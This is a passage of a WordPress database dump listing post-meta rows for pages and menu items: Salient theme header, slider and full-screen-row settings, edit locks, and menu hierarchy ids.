'_nectar_full_screen_rows_content_overflow','scrollbar'),(6899,6559,'_nectar_full_screen_rows_footer','none'),(6900,6559,'_nectar_slider_bg_type','image_bg'),(6901,6559,'_nectar_canvas_shapes',''),(6902,6559,'_nectar_media_upload_webm',''),(6903,6559,'_nectar_media_upload_mp4',''),(6904,6559,'_nectar_media_upload_ogv',''),(6905,6559,'_nectar_slider_preview_image',''),(6906,6559,'_nectar_header_bg',''),(6907,6559,'_nectar_header_parallax','off'),(6908,6559,'_nectar_header_box_roll','off'),(6909,6559,'_nectar_header_bg_height',''),(6910,6559,'_nectar_header_fullscreen','off'),(6911,6559,'_nectar_header_title',''),(6912,6559,'_nectar_header_subtitle',''),(6913,6559,'_nectar_page_header_text-effect','none'),(6914,6559,'_nectar_particle_rotation_timing',''),(6915,6559,'_nectar_particle_disable_explosion','off'),(6916,6559,'_nectar_page_header_alignment','left'),(6917,6559,'_nectar_page_header_alignment_v','middle'),(6918,6559,'_nectar_page_header_bg_alignment','center'),(6919,6559,'_nectar_header_bg_color',''),(6920,6559,'_nectar_header_font_color',''),(6921,6559,'_nectar_header_bg_overlay_color',''),(6922,6559,'_disable_transparent_header','off'),(6923,6559,'_force_transparent_header','off'),(6924,6559,'_wpb_vc_js_status','false'),(6926,6559,'_dp_original','6290'),(6927,6559,'_edit_lock','1514954514:1'),(6928,6559,'_edit_last','1'),(6929,6561,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6930,6561,'_menu_item_type','post_type'),(6931,6561,'_menu_item_menu_item_parent','6292'),(6932,6561,'_menu_item_object_id','6559'),(6933,6561,'_menu_item_object','page'),(6934,6561,'_menu_item_target',''),(6935,6561,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6936,6561,'_menu_item_xfn',''),(6937,6561,'_menu_item_url',''),(6939,6562,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6940,6562,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6941,6562,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6942,6562,'_wp_page_template','default'),(6943,6562,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6944,6562,'nectar-metabox-portfolio-display-sortable','off'),(6945,6562,'_nectar_full_screen_rows','off'),(6946,6562,'_nectar_full_screen_rows_animation','none'),(6947,6562,'_nectar_full_screen_rows_animation_speed','medium'),(6948,6562,'_nectar_full_screen_rows_overall_bg_color',''),(6949,6562,'_nectar_full_screen_rows_anchors','off'),(6950,6562,'_nectar_full_screen_rows_mobile_disable','off'),(6951,6562,'_nectar_full_screen_rows_row_bg_animation','none'),(6952,6562,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6953,6562,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6954,6562,'_nectar_full_screen_rows_footer','none'),(6955,6562,'_nectar_slider_bg_type','image_bg'),(6956,6562,'_nectar_canvas_shapes',''),(6957,6562,'_nectar_media_upload_webm',''),(6958,6562,'_nectar_media_upload_mp4',''),(6959,6562,'_nectar_media_upload_ogv',''),(6960,6562,'_nectar_slider_preview_image',''),(6961,6562,'_nectar_header_bg',''),(6962,6562,'_nectar_header_parallax','off'),(6963,6562,'_nectar_header_box_roll','off'),(6964,6562,'_nectar_header_bg_height',''),(6965,6562,'_nectar_header_fullscreen','off'),(6966,6562,'_nectar_header_title',''),(6967,6562,'_nectar_header_subtitle',''),(6968,6562,'_nectar_page_header_text-effect','none'),(6969,6562,'_nectar_particle_rotation_timing',''),(6970,6562,'_nectar_particle_disable_explosion','off'),(6971,6562,'_nectar_page_header_alignment','left'),(6972,6562,'_nectar_page_header_alignment_v','middle'),(6973,6562,'_nectar_page_header_bg_alignment','center'),(6974,6562,'_nectar_header_bg_color',''),(6975,6562,'_nectar_header_font_color',''),(6976,6562,'_nectar_header_bg_overlay_color',''),(6977,6562,'_disable_transparent_header','off'),(6978,6562,'_force_transparent_header','off'),(6979,6562,'_wpb_vc_js_status','false'),(6981,6562,'_dp_original','6290'),(6982,6562,'_edit_lock','1514954599:1'),(6983,6562,'_edit_last','1'),(6984,6564,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6985,6564,'_menu_item_type','post_type'),(6986,6564,'_menu_item_menu_item_parent','6292'),(6987,6564,'_menu_item_object_id','6562'),(6988,6564,'_menu_item_object','page'),(6989,6564,'_menu_item_target',''),(6990,6564,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6991,6564,'_menu_item_xfn',''),(6992,6564,'_menu_item_url',''),(6994,6565,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6995,6565,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6996,6565,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6997,6565,'_wp_page_template','default'),(6998,6565,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6999,6565,'nectar-metabox-portfolio-display-sortable','off'),(7000,6565,'_nectar_full_screen_rows','off'),(7001,6565,'_nectar_full_screen_rows_animation','none'),(7002,6565,'_nectar_full_screen_rows_animation_speed','medium'),(7003,6565,'_nectar_full_screen_rows_overall_bg_color',''),(7004,6565,'_nectar_full_screen_rows_anchors','off'),(7005,6565,'_nectar_full_screen_rows_mobile_disable','off'),(7006,6565,'_nectar_full_screen_rows_row_bg_animation','none'),(7007,6565,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7008,6565,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7009,6565,'_nectar_full_screen_rows_footer','none'),(7010,6565,'_nectar_slider_bg_type','image_bg'),(7011,6565,'_nectar_canvas_shapes',''),(7012,6565,'_nectar_media_upload_webm',''),(7013,6565,'_nectar_media_upload_mp4',''),(7014,6565,'_nectar_media_upload_ogv',''),(7015,6565,'_nectar_slider_preview_image',''),(7016,6565,'_nectar_header_bg',''),(7017,6565,'_nectar_header_parallax','off'),(7018,6565,'_nectar_header_box_roll','off'),(7019,6565,'_nectar_header_bg_height',''),(7020,6565,'_nectar_header_fullscreen','off'),(7021,6565,'_nectar_header_title',''),(7022,6565,'_nectar_header_subtitle',''),(7023,6565,'_nectar_page_header_text-effect','none'),(7024,6565,'_nectar_particle_rotation_timing',''),(7025,6565,'_nectar_particle_disable_explosion','off'),(7026,6565,'_nectar_page_header_alignment','left'),(7027,6565,'_nectar_page_header_alignment_v','middle'),(7028,6565,'_nectar_page_header_bg_alignment','center'),(7029,6565,'_nectar_header_bg_color',''),(7030,6565,'_nectar_header_font_color',''),(7031,6565,'_nectar_header_bg_overlay_color',''),(7032,6565,'_disable_transparent_header','off'),(7033,6565,'_force_transparent_header','off'),(7034,6565,'_wpb_vc_js_status','false'),(7036,6565,'_dp_original','6290'),(7037,6565,'_edit_lock','1514954685:1'),(7038,6565,'_edit_last','1'),(7039,6567,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7040,6567,'_menu_item_type','post_type'),(7041,6567,'_menu_item_menu_item_parent','6292'),(7042,6567,'_menu_item_object_id','6565'),(7043,6567,'_menu_item_object','page'),(7044,6567,'_menu_item_target',''),(7045,6567,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7046,6567,'_menu_item_xfn',''),(7047,6567,'_menu_item_url',''),(7049,6568,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7050,6568,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7051,6568,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7052,6568,'_wp_page_template','default'),(7053,6568,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7054,6568,'nectar-metabox-portfolio-display-sortable','off'),(7055,6568,'_nectar_full_screen_rows','off'),(7056,6568,'_nectar_full_screen_rows_animation','none'),(7057,6568,'_nectar_full_screen_rows_animation_speed','medium'),(7058,6568,'_nectar_full_screen_rows_overall_bg_color',''),(7059,6568,'_nectar_full_screen_rows_anchors','off'),(7060,6568,'_nectar_full_screen_rows_mobile_disable','off'),(7061,6568,'_nectar_full_screen_rows_row_bg_animation','none'),(7062,6568,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7063,6568,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7064,6568,'_nectar_full_screen_rows_footer','none'),(7065,6568,'_nectar_slider_bg_type','image_bg'),(7066,6568,'_nectar_canvas_shapes',''),(7067,6568,'_nectar_media_upload_webm',''),(7068,6568,'_nectar_media_upload_mp4',''),(7069,6568,'_nectar_media_upload_ogv',''),(7070,6568,'_nectar_slider_preview_image',''),(7071,6568,'_nectar_header_bg',''),(7072,6568,'_nectar_header_parallax','off'),(7073,6568,'_nectar_header_box_roll','off'),(7074,6568,'_nectar_header_bg_height',''),(7075,6568,'_nectar_header_fullscreen','off'),(7076,6568,'_nectar_header_title',''),(7077,6568,'_nectar_header_subtitle',''),(7078,6568,'_nectar_page_header_text-effect','none'),(7079,6568,'_nectar_particle_rotation_timing',''),(7080,6568,'_nectar_particle_disable_explosion','off'),(7081,6568,'_nectar_page_header_alignment','left'),(7082,6568,'_nectar_page_header_alignment_v','middle'),(7083,6568,'_nectar_page_header_bg_alignment','center'),(7084,6568,'_nectar_header_bg_color',''),(7085,6568,'_nectar_header_font_color',''),(7086,6568,'_nectar_header_bg_overlay_color',''),(7087,6568,'_disable_transparent_header','off'),(7088,6568,'_force_transparent_header','off'),(7089,6568,'_wpb_vc_js_status','false'),(7091,6568,'_dp_original','6290'),(7092,6568,'_edit_lock','1514954768:1'),(7093,6568,'_edit_last','1'),(7094,6570,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7095,6570,'_menu_item_type','post_type'),(7096,6570,'_menu_item_menu_item_parent','6292'),(7097,6570,'_menu_item_object_id','6568'),(7098,6570,'_menu_item_object','page'),(7099,6570,'_menu_item_target',''),(7100,6570,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7101,6570,'_menu_item_xfn',''),(7102,6570,'_menu_item_url',''),(7104,6571,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7105,6571,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7106,6571,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7107,6571,'_wp_page_template','default'),(7108,6571,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7109,6571,'nectar-metabox-portfolio-display-sortable','off'),(7110,6571,'_nectar_full_screen_rows','off'),(7111,6571,'_nectar_full_screen_rows_animation','none'),(7112,6571,'_nectar_full_screen_rows_animation_speed','medium'),(7113,6571,'_nectar_full_screen_rows_overall_bg_color',''),(7114,6571,'_nectar_full_screen_rows_anchors','off'),(7115,6571,'_nectar_full_screen_rows_mobile_disable','off'),(7116,6571,'_nectar_full_screen_rows_row_bg_animation','none'),(7117,6571,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7118,6571,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7119,6571,'_nectar_full_screen_rows_footer','none'),(7120,6571,'_nectar_slider_bg_type','image_bg'),(7121,6571,'_nectar_canvas_shapes',''),(7122,6571,'_nectar_media_upload_webm',''),(7123,6571,'_nectar_media_upload_mp4',''),(7124,6571,'_nectar_media_upload_ogv',''),(7125,6571,'_nectar_slider_preview_image',''),(7126,6571,'_nectar_header_bg',''),(7127,6571,'_nectar_header_parallax','off'),(7128,6571,'_nectar_header_box_roll','off'),(7129,6571,'_nectar_header_bg_height',''),(7130,6571,'_nectar_header_fullscreen','off'),(7131,6571,'_nectar_header_title',''),(7132,6571,'_nectar_header_subtitle',''),(7133,6571,'_nectar_page_header_text-effect','none'),(7134,6571,'_nectar_particle_rotation_timing',''),(7135,6571,'_nectar_particle_disable_explosion','off'),(7136,6571,'_nectar_page_header_alignment','left'),(7137,6571,'_nectar_page_header_alignment_v','middle'),(7138,6571,'_nectar_page_header_bg_alignment','center'),(7139,6571,'_nectar_header_bg_color',''),(7140,6571,'_nectar_header_font_color',''),(7141,6571,'_nectar_header_bg_overlay_color',''),(7142,6571,'_disable_transparent_header','off'),(7143,6571,'_force_transparent_header','off'),(7144,6571,'_wpb_vc_js_status','false'),(7146,6571,'_dp_original','6293'),(7147,6571,'_edit_lock','1514954855:1'),(7148,6571,'_edit_last','1'),(7149,6573,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7150,6573,'_menu_item_type','post_type'),(7151,6573,'_menu_item_menu_item_parent','6295'),(7152,6573,'_menu_item_object_id','6571'),(7153,6573,'_menu_item_object','page'),(7154,6573,'_menu_item_target',''),(7155,6573,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7156,6573,'_menu_item_xfn',''),(7157,6573,'_menu_item_url',''),(7159,6574,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7160,6574,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7161,6574,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7162,6574,'_wp_page_template','default'),(7163,6574,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7164,6574,'nectar-metabox-portfolio-display-sortable','off'),(7165,6574,'_nectar_full_screen_rows','off'),(7166,6574,'_nectar_full_screen_rows_animation','none'),(7167,6574,'_nectar_full_screen_rows_animation_speed','medium'),(7168,6574,'_nectar_full_screen_rows_overall_bg_color',''),(7169,6574,'_nectar_full_screen_rows_anchors','off'),(7170,6574,'_nectar_full_screen_rows_mobile_disable','off'),(7171,6574,'_nectar_full_screen_rows_row_bg_animation','none'),(7172,6574,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7173,6574,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7174,6574,'_nectar_full_screen_rows_footer','none'),(7175,6574,'_nectar_slider_bg_type','image_bg'),(7176,6574,'_nectar_canvas_shapes',''),(7177,6574,'_nectar_media_upload_webm',''),(7178,6574,'_nectar_media_upload_mp4',''),(7179,6574,'_nectar_media_upload_ogv',''),(7180,6574,'_nectar_slider_preview_image',''),(7181,6574,'_nectar_header_bg',''),(7182,6574,'_nectar_header_parallax','off'),(7183,6574,'_nectar_header_box_roll','off'),(7184,6574,'_nectar_header_bg_height',''),(7185,6574,'_nectar_header_fullscreen','off'),(7186,6574,'_nectar_header_title',''),(7187,6574,'_nectar_header_subtitle',''),(7188,6574,'_nectar_page_header_text-effect','none'),(7189,6574,'_nectar_particle_rotation_timing',''),(7190,6574,'_nectar_particle_disable_explosion','off'),(7191,6574,'_nectar_page_header_alignment','left'),(7192,6574,'_nectar_page_header_alignment_v','middle'),(7193,6574,'_nectar_page_header_bg_alignment','center'),(7194,6574,'_nectar_header_bg_color',''),(7195,6574,'_nectar_header_font_color',''),(7196,6574,'_nectar_header_bg_overlay_color',''),(7197,6574,'_disable_transparent_header','off'),(7198,6574,'_force_transparent_header','off'),(7199,6574,'_wpb_vc_js_status','false'),(7201,6574,'_dp_original','6293'),(7202,6574,'_edit_lock','1514954949:1'),(7203,6574,'_edit_last','1'),(7204,6577,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7205,6577,'_menu_item_type','post_type'),(7206,6577,'_menu_item_menu_item_parent','6295'),(7207,6577,'_menu_item_object_id','6574'),(7208,6577,'_menu_item_object','page'),(7209,6577,'_menu_item_target',''),(7210,6577,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7211,6577,'_menu_item_xfn',''),(7212,6577,'_menu_item_url',''),(7214,6578,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7215,6578,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7216,6578,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7217,6578,'_wp_page_template','default'),(7218,6578,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7219,6578,'nectar-metabox-portfolio-display-sortable','off'),(7220,6578,'_nectar_full_screen_rows','off'),(7221,6578,'_nectar_full_screen_rows_animation','none'),(7222,6578,'_nectar_full_screen_rows_animation_speed','medium'),(7223,6578,'_nectar_full_screen_rows_overall_bg_color',''),(7224,6578,'_nectar_full_screen_rows_anchors','off'),(7225,6578,'_nectar_full_screen_rows_mobile_disable','off'),(7226,6578,'_nectar_full_screen_rows_row_bg_animation','none'),(7227,6578,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7228,6578,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7229,6578,'_nectar_full_screen_rows_footer','none'),(7230,6578,'_nectar_slider_bg_type','image_bg'),(7231,6578,'_nectar_canvas_shapes',''),(7232,6578,'_nectar_media_upload_webm',''),(7233,6578,'_nectar_media_upload_mp4',''),(7234,6578,'_nectar_media_upload_ogv',''),(7235,6578,'_nectar_slider_preview_image',''),(7236,6578,'_nectar_header_bg',''),(7237,6578,'_nectar_header_parallax','off'),(7238,6578,'_nectar_header_box_roll','off'),(7239,6578,'_nectar_header_bg_height',''),(7240,6578,'_nectar_header_fullscreen','off'),(7241,6578,'_nectar_header_title',''),(7242,6578,'_nectar_header_subtitle',''),(7243,6578,'_nectar_page_header_text-effect','none'),(7244,6578,'_nectar_particle_rotation_timing',''),(7245,6578,'_nectar_particle_disable_explosion','off'),(7246,6578,'_nectar_page_header_alignment','left'),(7247,6578,'_nectar_page_header_alignment_v','middle'),(7248,6578,'_nectar_page_header_bg_alignment','center'),(7249,6578,'_nectar_header_bg_color',''),(7250,6578,'_nectar_header_font_color',''),(7251,6578,'_nectar_header_bg_overlay_color',''),(7252,6578,'_disable_transparent_header','off'),(7253,6578,'_force_transparent_header','off'),(7254,6578,'_wpb_vc_js_status','false'),(7256,6578,'_dp_original','6293'),(7257,6578,'_edit_lock','1514955061:1'),(7258,6578,'_edit_last','1'),(7259,6580,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7260,6580,'_menu_item_type','post_type'),(7261,6580,'_menu_item_menu_item_parent','6295'),(7262,6580,'_menu_item_object_id','6578'),(7263,6580,'_menu_item_object','page'),(7264,6580,'_menu_item_target',''),(7265,6580,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7266,6580,'_menu_item_xfn',''),(7267,6580,'_menu_item_url',''),(7269,6581,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7270,6581,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7271,6581,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7272,6581,'_wp_page_template','default'),(7273,6581,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7274,6581,'nectar-metabox-portfolio-display-sortable','off'),(7275,6581,'_nectar_full_screen_rows','off'),(7276,6581,'_nectar_full_screen_rows_animation','none'),(7277,6581,'_nectar_full_screen_rows_animation_speed','medium'),(7278,6581,'_nectar_full_screen_rows_overall_bg_color',''),(7279,6581,'_nectar_full_screen_rows_anchors','off'),(7280,6581,'_nectar_full_screen_rows_mobile_disable','off'),(7281,6581,'_nectar_full_screen_rows_row_bg_animation','none'),(7282,6581,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7283,6581,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7284,6581,'_nectar_full_screen_rows_footer','none'),(7285,6581,'_nectar_slider_bg_type','image_bg'),(7286,6581,'_nectar_canvas_shapes',''),(7287,6581,'_nectar_media_upload_webm',''),(7288,6581,'_nectar_media_upload_mp4',''),(7289,6581,'_nectar_media_upload_ogv',''),(7290,6581,'_nectar_slider_preview_image',''),(7291,6581,'_nectar_header_bg',''),(7292,6581,'_nectar_header_parallax','off'),(7293,6581,'_nectar_header_box_roll','off'),(7294,6581,'_nectar_header_bg_height',''),(7295,6581,'_nectar_header_fullscreen','off'),(7296,6581,'_nectar_header_title',''),(7297,6581,'_nectar_header_subtitle',''),(7298,6581,'_nectar_page_header_text-effect','none'),(7299,6581,'_nectar_particle_rotation_timing',''),(7300,6581,'_nectar_particle_disable_explosion','off'),(7301,6581,'_nectar_page_header_alignment','left'),(7302,6581,'_nectar_page_header_alignment_v','middle'),(7303,6581,'_nectar_page_header_bg_alignment','center'),(7304,6581,'_nectar_header_bg_color',''),(7305,6581,'_nectar_header_font_color',''),(7306,6581,'_nectar_header_bg_overlay_color',''),(7307,6581,'_disable_transparent_header','off'),(7308,6581,'_force_transparent_header','off'),(7309,6581,'_wpb_vc_js_status','false'),(7311,6581,'_dp_original','6293'),(7312,6581,'_edit_lock','1514955132:1'),(7313,6581,'_edit_last','1'),(7314,6583,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7315,6583,'_menu_item_type','post_type'),(7316,6583,'_menu_item_menu_item_parent','6295'),(7317,6583,'_menu_item_object_id','6581'),(7318,6583,'_menu_item_object','page'),(7319,6583,'_menu_item_target',''),(7320,6583,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7321,6583,'_menu_item_xfn',''),(7322,6583,'_menu_item_url',''),(7324,6584,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7325,6584,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7326,6584,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7327,6584,'_wp_page_template','default'),(7328,6584,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7329,6584,'nectar-metabox-portfolio-display-sortable','off'),(7330,6584,'_nectar_full_screen_rows','off'),(7331,6584,'_nectar_full_screen_rows_animation','none'),(7332,6584,'_nectar_full_screen_rows_animation_speed','medium'),(7333,6584,'_nectar_full_screen_rows_overall_bg_color',''),(7334,6584,'_nectar_full_screen_rows_anchors','off'),(7335,6584,'_nectar_full_screen_rows_mobile_disable','off'),(7336,6584,'_nectar_full_screen_rows_row_bg_animation','none'),(7337,6584,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7338,6584,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7339,6584,'_nectar_full_screen_rows_footer','none'),(7340,6584,'_nectar_slider_bg_type','image_bg'),(7341,6584,'_nectar_canvas_shapes',''),(7342,6584,'_nectar_media_upload_webm',''),(7343,6584,'_nectar_media_upload_mp4',''),(7344,6584,'_nectar_media_upload_ogv',''),(7345,6584,'_nectar_slider_preview_image',''),(7346,6584,'_nectar_header_bg',''),(7347,6584,'_nectar_header_parallax','off'),(7348,6584,'_nectar_header_box_roll','off'),(7349,6584,'_nectar_header_bg_height',''),(7350,6584,'_nectar_header_fullscreen','off'),(7351,6584,'_nectar_header_title',''),(7352,6584,'_nectar_header_subtitle',''),(7353,6584,'_nectar_page_header_text-effect','none'),(7354,6584,'_nectar_particle_rotation_timing',''),(7355,6584,'_nectar_particle_disable_explosion','off'),(7356,6584,'_nectar_page_header_alignment','left'),(7357,6584,'_nectar_page_header_alignment_v','middle'),(7358,6584,'_nectar_page_header_bg_alignment','center'),(7359,6584,'_nectar_header_bg_color',''),(7360,6584,'_nectar_header_font_color',''),(7361,6584,'_nectar_header_bg_overlay_color',''),(7362,6584,'_disable_transparent_header','off'),(7363,6584,'_force_transparent_header','off'),(7364,6584,'_wpb_vc_js_status','false'),(7366,6584,'_dp_original','6293'),(7367,6584,'_edit_lock','1514955205:1'),(7368,6584,'_edit_last','1'),(7369,6586,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7370,6586,'_menu_item_type','post_type'),(7371,6586,'_menu_item_menu_item_parent','6295'),(7372,6586,'_menu_item_object_id','6584'),(7373,6586,'_menu_item_object','page'),(7374,6586,'_menu_item_target',''),(7375,6586,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7376,6586,'_menu_item_xfn',''),(7377,6586,'_menu_item_url',''),(7379,6587,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7380,6587,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7381,6587,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7382,6587,'_wp_page_template','default'),(7383,6587,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7384,6587,'nectar-metabox-portfolio-display-sortable','off'),(7385,6587,'_nectar_full_screen_rows','off'),(7386,6587,'_nectar_full_screen_rows_animation','none'),(7387,6587,'_nectar_full_screen_rows_animation_speed','medium'),(7388,6587,'_nectar_full_screen_rows_overall_bg_color',''),(7389,6587,'_nectar_full_screen_rows_anchors','off'),(7390,6587,'_nectar_full_screen_rows_mobile_disable','off'),(7391,6587,'_nectar_full_screen_rows_row_bg_animation','none'),(7392,6587,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7393,6587,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7394,6587,'_nectar_full_screen_rows_footer','none'),(7395,6587,'_nectar_slider_bg_type','image_bg'),(7396,6587,'_nectar_canvas_shapes',''),(7397,6587,'_nectar_media_upload_webm',''),(7398,6587,'_nectar_media_upload_mp4',''),(7399,6587,'_nectar_media_upload_ogv',''),(7400,6587,'_nectar_slider_preview_image',''),(7401,6587,'_nectar_header_bg',''),(7402,6587,'_nectar_header_parallax','off'),(7403,6587,'_nectar_header_box_roll','off'),(7404,6587,'_nectar_header_bg_height',''),(7405,6587,'_nectar_header_fullscreen','off'),(7406,6587,'_nectar_header_title',''),(7407,6587,'_nectar_header_subtitle',''),(7408,6587,'_nectar_page_header_text-effect','none'),(7409,6587,'_nectar_particle_rotation_timing',''),(7410,6587,'_nectar_particle_disable_explosion','off'),(7411,6587,'_nectar_page_header_alignment','left'),(7412,6587,'_nectar_page_header_alignment_v','middle'),(7413,6587,'_nectar_page_header_bg_alignment','center'),(7414,6587,'_nectar_header_bg_color',''),(7415,6587,'_nectar_header_font_color',''),(7416,6587,'_nectar_header_bg_overlay_color',''),(7417,6587,'_disable_transparent_header','off'),(7418,6587,'_force_transparent_header','off'),(7419,6587,'_wpb_vc_js_status','false'),(7421,6587,'_dp_original','6293'),(7422,6587,'_edit_lock','1514955277:1'),(7423,6587,'_edit_last','1'),(7424,6589,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7425,6589,'_menu_item_type','post_type'),(7426,6589,'_menu_item_menu_item_parent','6295'),(7427,6589,'_menu_item_object_id','6587'),(7428,6589,'_menu_item_object','page'),(7429,6589,'_menu_item_target',''),(7430,6589,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7431,6589,'_menu_item_xfn',''),(7432,6589,'_menu_item_url',''),(7434,6590,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7435,6590,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7436,6590,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7437,6590,'_wp_page_template','default'),(7438,6590,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7439,6590,'nectar-metabox-portfolio-display-sortable','off'),(7440,6590,'_nectar_full_screen_rows','off'),(7441,6590,'_nectar_full_screen_rows_animation','none'),(7442,6590,'_nectar_full_screen_rows_animation_speed','medium'),(7443,6590,'_nectar_full_screen_rows_overall_bg_color',''),(7444,6590,'_nectar_full_screen_rows_anchors','off'),(7445,6590,'_nectar_full_screen_rows_mobile_disable','off'),(7446,6590,'_nectar_full_screen_rows_row_bg_animation','none'),(7447,6590,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7448,6590,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7449,6590,'_nectar_full_screen_rows_footer','none'),(7450,6590,'_nectar_slider_bg_type','image_bg'),(7451,6590,'_nectar_canvas_shapes',''),(7452,6590,'_nectar_media_upload_webm',''),(7453,6590,'_nectar_media_upload_mp4',''),(7454,6590,'_nectar_media_upload_ogv',''),(7455,6590,'_nectar_slider_preview_image',''),(7456,6590,'_nectar_header_bg',''),(7457,6590,'_nectar_header_parallax','off'),(7458,6590,'_nectar_header_box_roll','off'),(7459,6590,'_nectar_header_bg_height',''),(7460,6590,'_nectar_header_fullscreen','off'),(7461,6590,'_nectar_header_title',''),(7462,6590,'_nectar_header_subtitle',''),(7463,6590,'_nectar_page_header_text-effect','none'),(7464,6590,'_nectar_particle_rotation_timing',''),(7465,6590,'_nectar_particle_disable_explosion','off'),(7466,6590,'_nectar_page_header_alignment','left'),(7467,6590,'_nectar_page_header_alignment_v','middle'),(7468,6590,'_nectar_page_header_bg_alignment','center'),(7469,6590,'_nectar_header_bg_color',''),(7470,6590,'_nectar_header_font_color',''),(7471,6590,'_nectar_header_bg_overlay_color',''),(7472,6590,'_disable_transparent_header','off'),(7473,6590,'_force_transparent_header','off'),(7474,6590,'_wpb_vc_js_status','false'),(7476,6590,'_dp_original','6293'),(7477,6590,'_edit_lock','1514955370:1'),(7478,6590,'_edit_last','1'),(7479,6592,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7480,6592,'_menu_item_type','post_type'),(7481,6592,'_menu_item_menu_item_parent','6295'),(7482,6592,'_menu_item_object_id','6590'),(7483,6592,'_menu_item_object','page'),(7484,6592,'_menu_item_target',''),(7485,6592,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7486,6592,'_menu_item_xfn',''),(7487,6592,'_menu_item_url',''),(7489,6593,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7490,6593,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7491,6593